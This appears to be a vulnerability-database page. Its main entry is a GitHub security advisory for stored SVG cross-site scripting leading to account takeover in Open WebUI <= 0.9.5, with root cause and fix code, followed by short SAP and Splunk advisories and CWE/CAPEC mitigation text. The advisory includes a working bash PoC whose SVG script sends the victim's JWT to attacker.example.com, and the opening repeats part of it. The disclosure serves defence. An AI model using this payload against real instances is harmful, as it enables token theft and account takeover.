# Affected: open-webui <= 0.9.5
TARGET="http://localhost:8080"
ATTACKER_TOKEN="<attacker_JWT_from_localStorage.token>"
COLLECTOR="https://attacker.example.com/steal" # attacker-controlled listener
# --- Step 1: Build the malicious SVG (steals victim JWT from localStorage) ---
read -r -d '' SVG <<EOF
<svg xmlns="http://www.w3.org/2000/svg">
<script>
new Image().src="${COLLECTOR}?t="+encodeURIComponent(localStorage.getItem("token"));
</script>
</svg>
EOF
SVG_B64=$(printf '%s' "$SVG" | base64 -w0)
# --- Step 2: Store the payload in a model's profile_image_url ---
curl -s -X POST "${TARGET}/api/v1/models/create" \
-H "Authorization: Bearer ${ATTACKER_TOKEN}" \
-H "Content-Type: application/json" \
-d "{
\"id\": \"gpt-4-turbo-preview\",
\"name\": \"GPT-4 Turbo\",
\"base_model_id\": \"gpt-4\",
\"meta\": {
\"profile_image_url\": \"data:image/svg+xml;base64,${SVG_B64}\",
\"description\": \"Latest GPT-4 Turbo\"
},
\"params\": {},
\"access_grants\": []
}"
# --- Step 3: Trigger (victim navigates here, or attacker sends the link) ---
echo "Victim opens: ${TARGET}/api/v1/models/model/profile/image?id=gpt-4-turbo-preview"
Expected server response at Step 3 (the proof — SVG served inline, no defenses):
HTTP/1.1 200 OK
content-type: image/svg+xml
content-disposition: inline
<svg xmlns="http://www.w3.org/2000/svg">
<script>new Image().src="https://attacker.example.com/steal?t="+localStorage.getItem("token")</script>
</svg>
````
No X-Content-Type-Options, no Content-Security-Policy. The browser renders the SVG as a top-level document, the <script> executes in the Open WebUI origin, and the victim's JWT lands in the attacker's collector log. The attacker replays the JWT against the API for full account takeover (password change, admin promotion).
Trigger note: because the frontend loads model avatars in `<img src=...>` context (where SVG scripts do not run), exploitation requires the victim to load the URL as a top-level document — e.g. right-click → "Open image in new tab", or clicking the raw link when the attacker pastes it into a channel/chat. That single click is the only user interaction needed.
## Root Cause
An incomplete patch. When GHSA-3wgj-c2hg-vm6q was fixed, the validator was added to `UserUpdateForm` and `UpdateProfileForm`. When GHSA-3856-3vxq-m6fc was fixed, it was added to `ChannelWebhookForm`. But `ModelMeta` which uses the same `profile_image_url` field with the same serving logic was never touched. The output-side defenses (MIME allowlist + `nosniff`) were also only added to `users.py`, not to `models.py` or `channels.py`.
## Recommended Fix
**Input side** add the validator to `ModelMeta`:
```python
# backend/open_webui/models/models.py
from open_webui.utils.validate import validate_profile_image_url
class ModelMeta(BaseModel):
profile_image_url: Optional[str] = '/static/favicon.png'
# ...
@field_validator('profile_image_url', mode='before')
@classmethod
def check_profile_image_url(cls, v):
if v is None:
return v
return validate_profile_image_url(v)
Output side add MIME check and nosniff to the serving endpoint:
# backend/open_webui/routers/models.py
media_type = header.split(';')[0].lstrip('data:').lower()
if media_type not in PROFILE_IMAGE_ALLOWED_MIME_TYPES:
return FileResponse(f'{STATIC_DIR}/favicon.png')
return StreamingResponse(
image_buffer,
media_type=media_type,
headers={
'Content-Disposition': 'inline',
'X-Content-Type-Options': 'nosniff',
},
)
Both layers are necessary input validation prevents storage, output validation prevents serving even if a bypass is found later.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.9.5"
},
"package": {
"ecosystem": "PyPI",
"name": "open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-54013"
],
"database_specific": {
"cwe_ids": [
"CWE-116",
"CWE-693",
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-17T14:15:52Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "# Stored XSS to Account Takeover via Model Profile Images in Open WebUI\n\n**Affected:** Open WebUI \u003c= 0.9.5\n**Bypass of:** GHSA-3wgj-c2hg-vm6q, GHSA-3856-3vxq-m6fc\n\n---\n\n## TL;DR\n\nOpen WebUI patched SVG XSS in user profile images and webhook profile images but forgot to apply the same fix to **model** profile images. The `ModelMeta` class has no `validate_profile_image_url` field validator, and the model image serving endpoint has no MIME allowlist or `nosniff` header. Any authenticated user with `workspace.models` permission (enabled by default) can store a `data:image/svg+xml;base64,...` payload in a model\u0027s profile image and achieve full account takeover of anyone who navigates to the image URL.\n\n---\n\n## Past of the issue\n\nIn early 2025, two security advisories landed for Open WebUI:\n\n- **GHSA-3wgj-c2hg-vm6q** SVG XSS via user profile images\n- **GHSA-3856-3vxq-m6fc** SVG XSS via webhook profile images\n\nThe patches were clean. A `validate_profile_image_url` function was introduced in `backend/open_webui/utils/validate.py` a compiled regex that restricts `data:` URIs to safe raster formats (`image/png`, `image/jpeg`, `image/gif`, `image/webp`), explicitly excluding `image/svg+xml` because SVG can carry embedded `\u003cscript\u003e` tags. On the output side, `users.py` added a MIME allowlist check and `X-Content-Type-Options: nosniff`.\n\nThe fix was applied to `UserUpdateForm`, `UpdateProfileForm`, and later to `ChannelWebhookForm`. Three models patched. Case closed.\n\nExcept there was a fourth endpoint.\n\n## The Gap\n\nOpen WebUI has a concept of \"Models\" user-created model configurations with metadata including a profile image. The metadata lives in `ModelMeta`:\n\n```python\n# backend/open_webui/models/models.py, line 37-47\nclass ModelMeta(BaseModel):\n profile_image_url: Optional[str] = \u0027/static/favicon.png\u0027\n description: Optional[str] = None\n capabilities: Optional[dict] = None\n model_config = ConfigDict(extra=\u0027allow\u0027)\n```\n\nNo `@field_validator`. No import of `validate_profile_image_url`. `ModelMeta` accepts any string as `profile_image_url` including `data:image/svg+xml;base64,...`.\n\nThe serving endpoint at `GET /api/v1/models/model/profile/image` has the same gap:\n\n```python\n# backend/open_webui/routers/models.py, line 503-518\nelif profile_image_url.startswith(\u0027data:image\u0027):\n header, base64_data = profile_image_url.split(\u0027,\u0027, 1)\n image_data = base64.b64decode(base64_data)\n image_buffer = io.BytesIO(image_data)\n media_type = header.split(\u0027;\u0027)[0].lstrip(\u0027data:\u0027)\n\n headers = {\u0027Content-Disposition\u0027: \u0027inline\u0027}\n # ...\n return StreamingResponse(\n image_buffer,\n media_type=media_type,\n headers=headers,\n )\n```\n\nNo MIME allowlist. No `nosniff`. No CSP. The SVG is served inline with `Content-Type: image/svg+xml` on the application\u0027s origin.\n\nCompare this with the **patched** user endpoint:\n\n```python\n# backend/open_webui/routers/users.py, line 497-509\nmedia_type = header.split(\u0027;\u0027)[0].lstrip(\u0027data:\u0027).lower()\n\nif media_type not in PROFILE_IMAGE_ALLOWED_MIME_TYPES: # \u003c-- ABSENT in models.py\n return FileResponse(f\u0027{STATIC_DIR}/user.png\u0027)\n\nreturn StreamingResponse(\n image_buffer,\n media_type=media_type,\n headers={\n \u0027Content-Disposition\u0027: \u0027inline\u0027,\n \u0027X-Content-Type-Options\u0027: \u0027nosniff\u0027, # \u003c-- ABSENT in models.py\n },\n)\n```\n\nThe fix exists. It just was never applied here.\n\n## Comparison Table\n\n| Endpoint | Input Validation | MIME Allowlist | nosniff | Status |\n|----------|:---:|:---:|:---:|--------|\n| `GET /users/{id}/profile/image` | YES | YES | YES | **Patched** |\n| `GET /webhooks/{id}/profile/image` | YES | no | no | Partially patched |\n| `GET /models/model/profile/image` | **NO** | **NO** | **NO** | **Vulnerable** |\n\n## Three Write Vectors\n\nThe malicious SVG data URI can be injected through any of three endpoints all pass `ModelForm` containing `ModelMeta` without validation:\n\n1. **`POST /api/v1/models/create`** (line 195) any user with `workspace.models` permission\n2. **`POST /api/v1/models/update`** (line 581) model owner or admin\n3. **`POST /api/v1/models/import`** (line 279) admin only\n\nThe `workspace.models` permission is **enabled by default** for all non-pending users in a standard deployment.\n\n## The Attack\n\n**Step 1 Store the payload:**\n\n```bash\nSVG=$(echo \u0027\u003csvg xmlns=\"http://www.w3.org/2000/svg\"\u003e\n \u003cscript\u003e\n new Image().src=\"https://attacker.example.com/steal?t=\"+localStorage.getItem(\"token\")\n \u003c/script\u003e\n\u003c/svg\u003e\u0027 | base64 -w0)\n\ncurl -s -X POST \u0027https://TARGET/api/v1/models/create\u0027 \\\n -H \"Authorization: Bearer $ATTACKER_TOKEN\" \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \"{\n \\\"id\\\": \\\"gpt-4-turbo-preview\\\",\n \\\"name\\\": \\\"GPT-4 Turbo\\\",\n \\\"base_model_id\\\": \\\"gpt-4\\\",\n \\\"meta\\\": {\n \\\"profile_image_url\\\": \\\"data:image/svg+xml;base64,$SVG\\\",\n \\\"description\\\": \\\"Latest GPT-4 Turbo model\\\"\n },\n \\\"params\\\": {},\n \\\"access_grants\\\": []\n }\"\n```\n\n**Step 2 Victim navigates to the image URL:**\n\n```\nhttps://TARGET/api/v1/models/model/profile/image?id=gpt-4-turbo-preview\n```\n\nThis happens naturally when a user right-clicks a model\u0027s avatar and selects \"Open Image in New Tab\", or when the attacker sends the URL directly (e.g., in a channel message).\n\n**Step 3 Token theft:**\n\nThe server responds:\n\n```http\nHTTP/1.1 200 OK\ncontent-type: image/svg+xml\ncontent-disposition: inline\n\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\"\u003e\n \u003cscript\u003e\n new Image().src=\"https://attacker.example.com/steal?t=\"+localStorage.getItem(\"token\")\n \u003c/script\u003e\n\u003c/svg\u003e\n```\n\nNo `X-Content-Type-Options`. No `Content-Security-Policy`. The browser renders the SVG as a top-level document in the Open WebUI origin. The embedded `\u003cscript\u003e` executes. `localStorage.getItem(\"token\")` returns the victim\u0027s JWT. The attacker receives it and has full API access password changes, admin promotion, data exfiltration.\n\n## PoC\n\n```bash\n#!/usr/bin/env bash\n# PoC: Stored SVG XSS -\u003e token theft via Open WebUI model profile image\n# Affected: open-webui \u003c= 0.9.5\n\nTARGET=\"http://localhost:8080\"\nATTACKER_TOKEN=\"\u003cattacker_JWT_from_localStorage.token\u003e\"\nCOLLECTOR=\"https://attacker.example.com/steal\" # attacker-controlled listener\n\n# --- Step 1: Build the malicious SVG (steals victim JWT from localStorage) ---\nread -r -d \u0027\u0027 SVG \u003c\u003cEOF\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\"\u003e\n \u003cscript\u003e\n new Image().src=\"${COLLECTOR}?t=\"+encodeURIComponent(localStorage.getItem(\"token\"));\n \u003c/script\u003e\n\u003c/svg\u003e\nEOF\nSVG_B64=$(printf \u0027%s\u0027 \"$SVG\" | base64 -w0)\n\n# --- Step 2: Store the payload in a model\u0027s profile_image_url ---\ncurl -s -X POST \"${TARGET}/api/v1/models/create\" \\\n -H \"Authorization: Bearer ${ATTACKER_TOKEN}\" \\\n -H \"Content-Type: application/json\" \\\n -d \"{\n \\\"id\\\": \\\"gpt-4-turbo-preview\\\",\n \\\"name\\\": \\\"GPT-4 Turbo\\\",\n \\\"base_model_id\\\": \\\"gpt-4\\\",\n \\\"meta\\\": {\n \\\"profile_image_url\\\": \\\"data:image/svg+xml;base64,${SVG_B64}\\\",\n \\\"description\\\": \\\"Latest GPT-4 Turbo\\\"\n },\n \\\"params\\\": {},\n \\\"access_grants\\\": []\n }\"\n\n# --- Step 3: Trigger (victim navigates here, or attacker sends the link) ---\necho \"Victim opens: ${TARGET}/api/v1/models/model/profile/image?id=gpt-4-turbo-preview\"\n```\n\nExpected server response at Step 3 (the proof \u2014 SVG served inline, no defenses):\n\n```\nHTTP/1.1 200 OK\ncontent-type: image/svg+xml\ncontent-disposition: inline\n\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\"\u003e\n \u003cscript\u003enew Image().src=\"https://attacker.example.com/steal?t=\"+localStorage.getItem(\"token\")\u003c/script\u003e\n\u003c/svg\u003e\n````\nNo X-Content-Type-Options, no Content-Security-Policy. The browser renders the SVG as a top-level document, the \u003cscript\u003e executes in the Open WebUI origin, and the victim\u0027s JWT lands in the attacker\u0027s collector log. The attacker replays the JWT against the API for full account takeover (password change, admin promotion).\n\nTrigger note: because the frontend loads model avatars in `\u003cimg src=...\u003e` context (where SVG scripts do not run), exploitation requires the victim to load the URL as a top-level document \u2014 e.g. right-click \u2192 \"Open image in new tab\", or clicking the raw link when the attacker pastes it into a channel/chat. That single click is the only user interaction needed.\n\n## Root Cause\n\nAn incomplete patch. When GHSA-3wgj-c2hg-vm6q was fixed, the validator was added to `UserUpdateForm` and `UpdateProfileForm`. When GHSA-3856-3vxq-m6fc was fixed, it was added to `ChannelWebhookForm`. But `ModelMeta` which uses the same `profile_image_url` field with the same serving logic was never touched. The output-side defenses (MIME allowlist + `nosniff`) were also only added to `users.py`, not to `models.py` or `channels.py`.\n\n## Recommended Fix\n\n**Input side** add the validator to `ModelMeta`:\n\n```python\n# backend/open_webui/models/models.py\nfrom open_webui.utils.validate import validate_profile_image_url\n\nclass ModelMeta(BaseModel):\n profile_image_url: Optional[str] = \u0027/static/favicon.png\u0027\n # ...\n\n @field_validator(\u0027profile_image_url\u0027, mode=\u0027before\u0027)\n @classmethod\n def check_profile_image_url(cls, v):\n if v is None:\n return v\n return validate_profile_image_url(v)\n```\n\n**Output side** add MIME check and nosniff to the serving endpoint:\n\n```python\n# backend/open_webui/routers/models.py\nmedia_type = header.split(\u0027;\u0027)[0].lstrip(\u0027data:\u0027).lower()\n\nif media_type not in PROFILE_IMAGE_ALLOWED_MIME_TYPES:\n return FileResponse(f\u0027{STATIC_DIR}/favicon.png\u0027)\n\nreturn StreamingResponse(\n image_buffer,\n media_type=media_type,\n headers={\n \u0027Content-Disposition\u0027: \u0027inline\u0027,\n \u0027X-Content-Type-Options\u0027: \u0027nosniff\u0027,\n },\n)\n```\n\nBoth layers are necessary input validation prevents storage, output validation prevents serving even if a bypass is found later.",
"id": "GHSA-v2qm-5wxj-qhj7",
"modified": "2026-06-17T14:15:52Z",
"published": "2026-06-17T14:15:52Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-v2qm-5wxj-qhj7"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-webui/open-webui"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Open WebUI: Stored XSS to Account Takeover via Model Profile Images "
}
GHSA-V3PV-PPV6-V9RF
Vulnerability from github – Published: 2022-05-24 19:14 – Updated: 2022-05-24 19:14Due to missing encoding in SAP Contact Center's Communication Desktop component- version 700, an attacker could send malicious script in chat message. When the message is accepted by the chat recipient, the script gets executed in their scope. Due to the usage of ActiveX in the application, the attacker can further execute operating system level commands in the chat recipient's scope. This could lead to a complete compromise of their confidentiality, integrity, and could temporarily impact their availability.
{
"affected": [],
"aliases": [
"CVE-2021-33672"
],
"database_specific": {
"cwe_ids": [
"CWE-116"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-09-14T12:15:00Z",
"severity": "CRITICAL"
},
"details": "Due to missing encoding in SAP Contact Center\u0027s Communication Desktop component- version 700, an attacker could send malicious script in chat message. When the message is accepted by the chat recipient, the script gets executed in their scope. Due to the usage of ActiveX in the application, the attacker can further execute operating system level commands in the chat recipient\u0027s scope. This could lead to a complete compromise of their confidentiality, integrity, and could temporarily impact their availability.",
"id": "GHSA-v3pv-ppv6-v9rf",
"modified": "2022-05-24T19:14:28Z",
"published": "2022-05-24T19:14:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33672"
},
{
"type": "WEB",
"url": "https://launchpad.support.sap.com/#/notes/3073891"
},
{
"type": "WEB",
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-V72V-M6VQ-49VH
Vulnerability from github – Published: 2023-06-01 18:30 – Updated: 2024-04-04 04:27In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, an attacker can use a specially crafted web URL in their browser to cause log file poisoning. The attack requires the attacker to have secure shell (SSH) access to the instance and use a terminal program that supports a certain feature set to execute the attack successfully.
{
"affected": [],
"aliases": [
"CVE-2023-32712"
],
"database_specific": {
"cwe_ids": [
"CWE-116",
"CWE-117"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-06-01T17:15:10Z",
"severity": "LOW"
},
"details": "In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, an attacker can use a specially crafted web URL in their browser to cause log file poisoning. The attack requires the attacker to have secure shell (SSH) access to the instance and use a terminal program that supports a certain feature set to execute the attack successfully.",
"id": "GHSA-v72v-m6vq-49vh",
"modified": "2024-04-04T04:27:54Z",
"published": "2023-06-01T18:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32712"
},
{
"type": "WEB",
"url": "https://advisory.splunk.com/advisories/SVD-2023-0606"
},
{
"type": "WEB",
"url": "https://research.splunk.com/application/de3908dc-1298-446d-84b9-fa81d37e959b"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-4.3
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.
- Alternately, use built-in functions, but consider using wrappers in case those functions are discovered to have a vulnerability.
Mitigation MIT-27
Strategy: Parameterization
- If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
- For example, stored procedures can enforce database query structure and reduce the likelihood of SQL injection.
Mitigation
Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
Mitigation
In some cases, input validation may be an important strategy when output encoding is not a complete solution. For example, you may be providing the same output that will be processed by multiple consumers that use different encodings or representations. In other cases, you may be required to allow user-supplied input to contain control information, such as limited HTML tags that support formatting in a wiki or bulletin board. When this type of requirement must be met, use an extremely strict allowlist to limit which control sequences can be used. Verify that the resulting syntactic structure is what you expect. Use your normal encoding methods for the remainder of the input.
Mitigation
Use input validation as a defense-in-depth measure to reduce the likelihood of output encoding errors (see CWE-20).
Mitigation
Fully specify which encodings are required by components that will be communicating with each other.
Mitigation
When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so.
CAPEC-104: Cross Zone Scripting
An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security.
CAPEC-73: User-Controlled Filename
An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.
CAPEC-81: Web Server Logs Tampering
Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.
CAPEC-85: AJAX Footprinting
This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.